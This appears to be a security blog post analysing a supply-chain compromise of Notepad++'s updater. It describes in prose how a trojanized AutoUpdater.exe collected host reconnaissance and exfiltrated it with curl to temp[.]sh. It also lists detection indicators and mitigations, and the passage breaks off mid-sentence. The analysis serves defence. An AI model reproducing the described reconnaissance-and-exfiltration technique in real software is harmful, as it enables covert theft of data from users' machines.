 BACK TO BLOGS  Back to Press Releases Text Link What happened in the Notepad++ compromise On February 2nd, 2026, free source-code developer Notepad++ was compromised. Developer Don Ho published a security disclosure stating the compromise affected the update infrastructure behind Notepad++. The disclosure states that multiple research groups likely implicate a Chinese state-sponsored group. The respective Advanced Persistent Threats (APT) groups maintained access from June 2025 until December 2nd, 2025. Ho’s disclosure goes on to detail the sophistication of the supply chain attack targeting their update mechanisms. In this campaign, state-sponsored attackers successfully hijacked part of the legitimate distribution process. Rather than exploiting end users directly, the adversary abused the trusted relationship between Notepad++ and its update infrastructure, enabling the delivery of trojanized installers to selectively targeted users. The impact of this compromise is significant due to the widespread adoption of Notepad++ among developers, system administrators, and security professionals. By weaponizing a trusted software update path, the attackers gained initial access, reconnaissance, and persistence within victim environments—remaining undetected for months. This compromise illustrates once again how software supply chains remain a high-value target for nation-state actors. Notepad++ has a history of maintaining a political stance as geopolitical events unfold across the globe. Prior releases have been published with clear political messages including standing with Hong Kong as early as v7.8.9 , supporting Taiwan's independence in v8.6.9 , and more recently standing with Ukraine in v8.8.1 . A special note can be placed on the irony surrounding the alleged Chinese APTs compromising Notepad++'s supply chain after multiple political messages supporting Taiwan, Hong Kong, and Ukraine. Technical analysis of the comprised update mechanism The attack specifically utilizes the WinGUP ( GUP.exe ) updater component of the Notepad++ update mechanism. Attackers distributed trojanized Notepad++ installers to targeted users, ensuring that the initial execution appeared legitimate and aligned with normal user behavior. During the compromised update flow, the GUP.exe process was observed spawning an executable named AutoUpdater.exe . That behavior is anomalous under normal conditions. Ordinarily, WinGUP performs update checks and downloads using the libcurl library internally and does not launch external binaries or invoke curl.exe directly. Once executed, AutoUpdater.exe conducts a series of host-based reconnaissance actions. These actions included enumerating active network connections, collecting endpoint and operating system details, listing running processes, and identifying any actively logged-in user(s). The information was aggregated and written to a local file named " a.txt ". Following data collection, the malware leveraged curl.exe to exfiltrate the contents of " a.txt " to a remote endpoint hosted on file-sharing service temp[.]sh . The presence of a rogue c url.exe binary is a particularly strong indicator of malicious activity in this context, as it deviates from the expected behavior of the WinGUP updater and introduces a living-off-the-land style exfiltration technique. Public reporting indicates that this campaign persisted for approximately six months, with attackers maintaining control over the compromised update channel and selectively targeting victims. The long dwell time suggests careful operational security and a high degree of confidence in the stealth of the attack. Detection opportunities for malicious update activity WinGUP invoking external curl binaries Curl commands reaching out to temp[.]sh Creation of an a.txt file or one letter .txt files, as this is how data is exfiltrated Instances of AutoUpdater.exe spawning from temporary directories Mitigations strategies for supply chain attacks Implement a robust Allowlisting solution Analyze unusual network activity from applications in temporary directories Update trojanized versions of Notepad++ (versions 8.8.2 - 8.8.9) to 8.9.1 Download updates manually from official sources as opposed to using built-in updaters How organizations can defend against supply chain attacks Supply chain compromises are especially dangerous because they abuse trusted software and legitimate update mechanisms. To defend against these attacks, security teams need visibility into application behavior, strict execution controls, and continuous monitoring for deviations from normal update workflows. In this instance, a custom binary ( Autoupdater.exe ) spawned from a trusted updater. Implement application control strategies that prevent unauthorized binaries from executing, even when launched by a trusted parent process. Update mechanisms should also not be permitted to invoke extra tools, spawn additional executables, or communicate with unapproved domains withou